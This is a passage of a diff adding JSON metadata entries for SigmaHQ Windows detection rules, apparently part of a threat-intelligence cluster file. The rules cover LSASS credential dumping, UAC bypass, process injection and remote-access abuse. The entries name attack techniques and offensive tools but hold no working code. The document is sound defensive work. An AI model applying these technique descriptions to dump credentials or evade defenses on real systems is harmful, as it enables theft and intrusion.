"proc_access_win_lazagne_cred_dump_lsass_access.yml", + "author": "Bhabesh Raj, Jonhnathan Ribeiro", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_access", + "logsource.product": "windows" + } + }, + { + "description": "Detects the process injection of a LittleCorporal generated Maldoc.", + "uuid": "7bdde3bf-2a42-4c39-aa31-a92b3e17afac", + "value": "LittleCorporal Generated Maldoc Injection", + "meta": { + "refs": [ + "https://github.com/connormcgarr/LittleCorporal", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_littlecorporal_generated_maldoc.yml" + ], + "tags": [ + "attack.execution", + "attack.t1204.002", + "attack.t1055.003" + ], + "creation_date": "2021/08/09", + "filename": "proc_access_win_littlecorporal_generated_maldoc.yml", + "author": "Christian Burkard", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_access", + "logsource.product": "windows" + } + }, + { + "description": "COM interface (EditionUpgradeManager) that is not used by standard executables.", + "uuid": "fb3722e4-1a06-46b6-b772-253e2e7db933", + "value": "Load Undocumented Autoelevated COM Interface", + "meta": { + "refs": [ + "https://www.snip2code.com/Snippet/4397378/UAC-bypass-using-EditionUpgradeManager-C/", + "https://gist.github.com/hfiref0x/de9c83966623236f5ebf8d9ae2407611", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_load_undocumented_autoelevated_com_interface.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ], + "creation_date": "2020/10/07", + "filename": "proc_access_win_load_undocumented_autoelevated_com_interface.yml", + "author": "oscd.community, Dmitry Uchakin", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_access", + "logsource.product": "windows" + } + }, + { + "description": "Detects 
adversaries leveraging the MiniDump export function from comsvcs.dll via rundll32 to perform a memory dump from lsass.", + "uuid": "a49fa4d5-11db-418c-8473-1e014a8dd462", + "value": "Lsass Memory Dump via Comsvcs DLL", + "meta": { + "refs": [ + "https://twitter.com/shantanukhande/status/1229348874298388484", + "https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_dump_comsvcs_dll.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ], + "creation_date": "2020/10/20", + "filename": "proc_access_win_lsass_dump_comsvcs_dll.yml", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_access", + "logsource.product": "windows" + } + }, + { + "description": "Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.", + "uuid": "5ef9853e-4d0e-4a70-846f-a9ca37d876da", + "value": "LSASS Memory Dump", + "meta": { + "refs": [ + "https://blog.menasec.net/2019/02/threat-hunting-21-procdump-or-taskmgr.html", + "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.001/T1003.001.md", + "https://research.splunk.com/endpoint/windows_possible_credential_dumping/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_memdump.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" + ], + "creation_date": "2019/04/03", + "filename": "proc_access_win_lsass_memdump.yml", + "author": "Samir Bousseaden, Michael Haag", + "level": "high", + "falsepositive": [ + "False 
positives are present when looking for 0x1410. Exclusions may be required." + ], + "logsource.category": "process_access", + "logsource.product": "windows" + } + }, + { + "description": "Detects a possible process memory dump that uses the white-listed filename like TrolleyExpress.exe as a way to dump the lsass process memory without Microsoft Defender interference", + "uuid": "4be8b654-0c01-4c9d-a10c-6b28467fc651", + "value": "LSASS Access from White-Listed Processes", + "meta": { + "refs": [ + "https://twitter.com/_xpn_/status/1491557187168178176", + "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz", + "https://twitter.com/mrd0x/status/1460597833917251595", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_memdump_evasion.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" + ], + "creation_date": "2022/02/10", + "filename": "proc_access_win_lsass_memdump_evasion.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unlikely, since these tools shouldn't access lsass.exe at all" + ], + "logsource.category": "process_access", + "logsource.product": "windows" + } + }, + { + "description": "Detects a possible process memory dump based on a keyword in the file name of the accessing process", + "uuid": "9bd012ee-0dff-44d7-84a0-aa698cfd87a3", + "value": "LSASS Memory Access by Tool Named Dump", + "meta": { + "refs": [ + "https://twitter.com/_xpn_/status/1491557187168178176", + "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_memdump_indicators.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" + ], + "creation_date": "2022/02/10", + "filename": 
"proc_access_win_lsass_memdump_indicators.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Rare programs that contain the word dump in their name and access lsass" + ], + "logsource.category": "process_access", + "logsource.product": "windows" + } + }, + { + "description": "Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.", + "uuid": "e5b33f7d-eb93-48b6-9851-09e1e610b6d7", + "value": "WerFault Accassing LSASS", + "meta": { + "refs": [ + "https://github.com/helpsystems/nanodump/commit/578116faea3d278d53d70ea932e2bbfe42569507", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_werfault.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" + ], + "creation_date": "2012/06/27", + "filename": "proc_access_win_lsass_werfault.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Actual failures in lsass.exe that trigger a crash dump (unlikely)", + "Unknown cases in which WerFault accesses lsass.exe" + ], + "logsource.category": "process_access", + "logsource.product": "windows" + } + }, + { + "description": "Detects a process access to verclsid.exe that injects shellcode from a Microsoft Office application / VBA macro", + "uuid": "b7967e22-3d7e-409b-9ed5-cdae3f9243a1", + "value": "Malware Shellcode in Verclsid Target Process", + "meta": { + "refs": [ + "https://twitter.com/JohnLaTwC/status/837743453039534080", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_malware_verclsid_shellcode.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" + ], + "creation_date": "2017/03/04", + "filename": "proc_access_win_malware_verclsid_shellcode.yml", + "author": "John Lambert (tech), Florian Roth (rule)", + 
"level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_access", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of mimikatz through WinRM protocol by monitoring access to lsass process by wsmprovhost.exe.", + "uuid": "aa35a627-33fb-4d04-a165-d33b4afca3e8", + "value": "Mimikatz through Windows Remote Management", + "meta": { + "refs": [ + "https://pentestlab.blog/2018/05/15/lateral-movement-winrm/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_mimikatz_trough_winrm.yml" + ], + "tags": [ + "attack.credential_access", + "attack.execution", + "attack.t1003.001", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.006", + "attack.s0002" + ], + "creation_date": "2019/05/20", + "filename": "proc_access_win_mimikatz_trough_winrm.yml", + "author": "Patryk Prauze - ING Tech", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_access", + "logsource.product": "windows" + } + }, + { + "description": "Detects LSASS process access by pypykatz for credential dumping.", + "uuid": "7186e989-4ed7-4f4e-a656-4674b9e3e48b", + "value": "Credential Dumping by Pypykatz", + "meta": { + "refs": [ + "https://github.com/skelsec/pypykatz", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_pypykatz_cred_dump_lsass_access.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ], + "creation_date": "2021/08/03", + "filename": "proc_access_win_pypykatz_cred_dump_lsass_access.yml", + "author": "Bhabesh Raj", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_access", + "logsource.product": "windows" + } + }, + { + "description": "Detects process access to LSASS memory with suspicious access flags 0x410 and 0x01410 (spin-off of similar rule)", + "uuid": "678dfc63-fefb-47a5-a04c-26bcf8cc9f65", + "value": "Rare GrantedAccess Flags on 
LSASS Access", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights", + "https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow", + "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_rare_proc_access_lsass.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" + ], + "creation_date": "2022/03/13", + "filename": "proc_access_win_rare_proc_access_lsass.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Legitimate software accessing LSASS process for legitimate reason" + ], + "logsource.category": "process_access", + "logsource.product": "windows" + } + }, + { + "description": "Detects process access to LSASS memory with suspicious access flags", + "uuid": "a18dd26b-6450-46de-8c91-9659150cf088", + "value": "Suspicious GrantedAccess Flags on LSASS Access", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights", + "https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow", + "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_susp_proc_access_lsass.yml" + ], + "tags": [ + 
"attack.credential_access", + "attack.t1003.001", + "attack.s0002" + ], + "creation_date": "2021/11/22", + "filename": "proc_access_win_susp_proc_access_lsass.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Legitimate software accessing LSASS process for legitimate reason" + ], + "logsource.category": "process_access", + "logsource.product": "windows" + } + }, + { + "description": "Detects process access to LSASS memory with suspicious access flags and from a suspicious folder", + "uuid": "fa34b441-961a-42fa-a100-ecc28c886725", + "value": "LSASS Access from Program in Suspicious Folder", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights", + "https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow", + "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_susp_proc_access_lsass_susp_source.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" + ], + "creation_date": "2021/11/27", + "filename": "proc_access_win_susp_proc_access_lsass_susp_source.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Legitimate software accessing LSASS process for legitimate reason" + ], + "logsource.category": "process_access", + "logsource.product": "windows" + } + }, + { + "description": "Detects when a process, such as mimikatz, accesses the memory of svchost to dump credentials", + "uuid": "174afcfa-6e40-4ae9-af64-496546389294", + "value": "SVCHOST Credential Dump", + "meta": { + "refs": [ + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_svchost_cred_dump.yml" + ], + "tags": [ + "attack.t1548" + ], + "creation_date": "2021/04/30", + "filename": "proc_access_win_svchost_cred_dump.yml", + "author": "Florent Labouyrie", + "level": "high", + "falsepositive": [ + "Non identified legit exectubale" + ], + "logsource.category": "process_access", + "logsource.product": "windows" + } + }, + { + "description": "Detects the pattern of UAC Bypass using a WoW64 logger DLL hijack (UACMe 30)", + "uuid": "4f6c43e2-f989-4ea5-bcd8-843b49a0317c", + "value": "UAC Bypass Using WOW64 Logger DLL Hijack", + "meta": { + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_uac_bypass_wow64_logger.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ], + "creation_date": "2021/08/23", + "filename": "proc_access_win_uac_bypass_wow64_logger.yml", + "author": "Christian Burkard", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_access", + "logsource.product": "windows" + } + }, + { + "description": "7-Zip through 21.07 on Windows allows privilege escalation (CVE-2022-29072) and command execution when a file with the .7z extension is dragged to the Help>Contents area. This is caused by misconfiguration of 7z.dll and a heap overflow. 
The command runs in a child process under the 7zFM.exe process.", + "uuid": "9a4ccd1a-3526-4d99-b980-9f9c5d3a6ee3", + "value": "Suspicious 7zip Subprocess", + "meta": { + "refs": [ + "https://github.com/kagancapar/CVE-2022-29072", + "https://twitter.com/kagancapar/status/1515219358234161153", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_7zip_cve_2022_29072.yml" + ], + "tags": [ + "cve.2022.29072" + ], + "creation_date": "2022/04/17", + "filename": "proc_creation_win_7zip_cve_2022_29072.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detection of unusual child processes by different system processes", + "uuid": "d522eca2-2973-4391-a3e0-ef0374321dae", + "value": "Abused Debug Privilege by Arbitrary Parent Processes", + "meta": { + "refs": [ + "https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-74-638.jpg", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_abusing_debug_privilege.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1548" + ], + "creation_date": "2020/10/28", + "filename": "proc_creation_win_abusing_debug_privilege.yml", + "author": "Semanur Guneysu @semanurtg, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Windows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections. This binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run. 
The problem is, it will run any arbitrary command without restriction of location or type.", + "uuid": "f548a603-c9f2-4c89-b511-b089f7e94549", + "value": "Abusing Windows Telemetry For Persistence", + "meta": { + "refs": [ + "https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_abusing_windows_telemetry_for_persistence.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.t1112", + "attack.t1053" + ], + "creation_date": "2020/09/29", + "filename": "proc_creation_win_abusing_windows_telemetry_for_persistence.yml", + "author": "Sreeman", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Accesschk is an access and privilege audit tool developed by SysInternal and often being used by attacker to verify privileges", + "uuid": "c625d754-6a3d-4f65-9c9a-536aea960d37", + "value": "Accesschk Usage To Check Privileges", + "meta": { + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment?slide=43", + "https://www.youtube.com/watch?v=JGs-aKf2OtU&ab_channel=OFFZONEMOSCOW", + "https://github.com/carlospolop/PEASS-ng/blob/fa0f2e17fbc1d86f1fd66338a40e665e7182501d/winPEAS/winPEASbat/winPEAS.bat", + "https://github.com/gladiatx0r/Powerless/blob/04f553bbc0c65baf4e57344deff84e3f016e6b51/Powerless.bat", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_accesschk_usage_after_priv_escalation.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1069.001" + ], + "creation_date": "2020/10/13", + "filename": "proc_creation_win_accesschk_usage_after_priv_escalation.yml", + "author": "Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community, Nasreddine Bencherchali (modified)", + "level": "medium", + "falsepositive": [ + 
"System administrator Usage" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups.", + "uuid": "bef37fa2-f205-4a7b-b484-0759bfd5f86f", + "value": "Advanced IP Scanner", + "meta": { + "refs": [ + "https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/", + "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html", + "https://labs.f-secure.com/blog/prelude-to-ransomware-systembc", + "https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf", + "https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer", + "https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/Advanced%20IP%20Scanner", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_advanced_ip_scanner.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1046", + "attack.t1135" + ], + "creation_date": "2020/05/12", + "filename": "proc_creation_win_advanced_ip_scanner.yml", + "author": "@ROxPinTeddy, Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate administrative use" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of Advanced Port Scanner.", + "uuid": "54773c5f-f1cc-4703-9126-2f797d96a69d", + "value": "Advanced Port Scanner", + "meta": { + "refs": [ + "https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/Advanced%20Port%20Scanner", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_advanced_port_scanner.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1046", + "attack.t1135" + ], + "creation_date": "2021/12/18", + "filename": "proc_creation_win_advanced_port_scanner.yml", 
+ "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate administrative use", + "Tools with similar commandline (very rare)" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects execution from an Alternate Data Stream (ADS). Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection", + "uuid": "7f43c430-5001-4f8b-aaa9-c3b88f18fa5c", + "value": "Execute From Alternate Data Streams", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_alternate_data_streams.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.004" + ], + "creation_date": "2021/09/01", + "filename": "proc_creation_win_alternate_data_streams.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects Windows Installer service (msiexec.exe) spawning \"cmd\" or \"powershell\"", + "uuid": "1e53dd56-8d83-4eb4-a43e-b790a05510aa", + "value": "Always Install Elevated MSI Spawned Cmd And Powershell", + "meta": { + "refs": [ + "https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-50-638.jpg", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_always_install_elevated_msi_spawned_cmd_powershell.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1548.002" + ], + "creation_date": "2020/10/13", + "filename": "proc_creation_win_always_install_elevated_msi_spawned_cmd_powershell.yml", + "author": "Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community", + "level": "medium", + 
"falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects Windows Installer service (msiexec.exe) trying to install MSI packages with SYSTEM privilege", + "uuid": "cd951fdc-4b2f-47f5-ba99-a33bf61e3770", + "value": "Always Install Elevated Windows Installer", + "meta": { + "refs": [ + "https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-48-638.jpg", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_always_install_elevated_windows_installer.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1548.002" + ], + "creation_date": "2020/10/13", + "filename": "proc_creation_win_always_install_elevated_windows_installer.yml", + "author": "Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community", + "level": "medium", + "falsepositive": [ + "System administrator usage", + "Anti virus products" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. 
(Citation: Symantec Living off the Land)\n", + "uuid": "b52e84a3-029e-4529-b09b-71d19dd27e94", + "value": "Use of Anydesk Remote Access Software", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-2---anydesk-files-detected-test-on-windows", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_anydesk.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ], + "creation_date": "2022/02/11", + "filename": "proc_creation_win_anydesk.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate use" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects piping the password to an anydesk instance via CMD and the '--set-password' flag", + "uuid": "b1377339-fda6-477a-b455-ac0923f9ec2c", + "value": "AnyDesk Inline Piped Password", + "meta": { + "refs": [ + "https://redcanary.com/blog/misbehaving-rats/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_anydesk_piped_password_via_cli.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ], + "creation_date": "2022/09/28", + "filename": "proc_creation_win_anydesk_piped_password_via_cli.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Legitimate piping of the password to anydesk", + "Some FP could occure with similar tools that uses the same command line '--set-password'" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects AnyDesk Remote Desktop silent installation. 
Which can be used by attackers to gain remote access.", + "uuid": "114e7f1c-f137-48c8-8f54-3088c24ce4b9", + "value": "AnyDesk Silent Installation", + "meta": { + "refs": [ + "https://twitter.com/TheDFIRReport/status/1423361119926816776?s=20", + "https://support.anydesk.com/Automatic_Deployment", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_anydesk_silent_install.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ], + "creation_date": "2021/08/06", + "filename": "proc_creation_win_anydesk_silent_install.yml", + "author": "J\u00e1n Tren\u010dansk\u00fd", + "level": "high", + "falsepositive": [ + "Legitimate deployment of AnyDesk" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. 
(Citation: Symantec Living off the Land)\n", + "uuid": "065b00ca-5d5c-4557-ac95-64a6d0b64d86", + "value": "Use of Anydesk Remote Access Software from Suspicious Folder", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-2---anydesk-files-detected-test-on-windows", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_anydesk_susp_folder.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ], + "creation_date": "2022/05/20", + "filename": "proc_creation_win_anydesk_susp_folder.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Legitimate use of AnyDesk from a non-standard folder" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects specific process parameters as used by ACTINIUM scheduled task persistence creation.", + "uuid": "e1118a8f-82f5-44b3-bb6b-8a284e5df602", + "value": "Scheduled Task WScript VBScript", + "meta": { + "refs": [ + "https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_actinium_persistence.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1053", + "attack.t1053.005" + ], + "creation_date": "2022/02/07", + "filename": "proc_creation_win_apt_actinium_persistence.yml", + "author": "Andreas Hunkeler (@Karneades)", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "This method detects a suspicious PowerShell command line combination as used by APT29 in a campaign against U.S. 
think tanks.", + "uuid": "033fe7d6-66d1-4240-ac6b-28908009c71f", + "value": "APT29", + "meta": { + "refs": [ + "https://www.microsoft.com/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/", + "https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_apt29_thinktanks.yml" + ], + "tags": [ + "attack.execution", + "attack.g0016", + "attack.t1059.001" + ], + "creation_date": "2018/12/04", + "filename": "proc_creation_win_apt_apt29_thinktanks.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects activity that could be related to Baby Shark malware", + "uuid": "2b30fa36-3a18-402f-a22d-bf4ce2189f35", + "value": "Baby Shark Activity", + "meta": { + "refs": [ + "https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_babyshark.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.003", + "attack.t1059.001", + "attack.discovery", + "attack.t1012", + "attack.defense_evasion", + "attack.t1218.005" + ], + "creation_date": "2019/02/24", + "filename": "proc_creation_win_apt_babyshark.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects Russian group activity as described in Global Threat Report 2019 by Crowdstrike", + "uuid": "b83f5166-9237-4b5e-9cd4-7b5d52f4d8ee", + "value": "Judgement Panda Credential Access Activity", + "meta": { + "refs": [ + 
"https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_bear_activity_gtr19.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.001", + "attack.t1003.003" + ], + "creation_date": "2019/02/21", + "filename": "proc_creation_win_apt_bear_activity_gtr19.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects a suspicious DLL loading from AppData Local path as described in BlueMashroom report", + "uuid": "bd70d3f8-e60e-4d25-89f0-0b5a9cff20e0", + "value": "BlueMashroom DLL Load", + "meta": { + "refs": [ + "https://www.virusbulletin.com/conference/vb2019/abstracts/apt-cases-exploiting-vulnerabilities-region-specific-software", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_bluemashroom.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.010" + ], + "creation_date": "2019/10/02", + "filename": "proc_creation_win_apt_bluemashroom.yml", + "author": "Florian Roth, Tim Shelton", + "level": "critical", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects Chafer 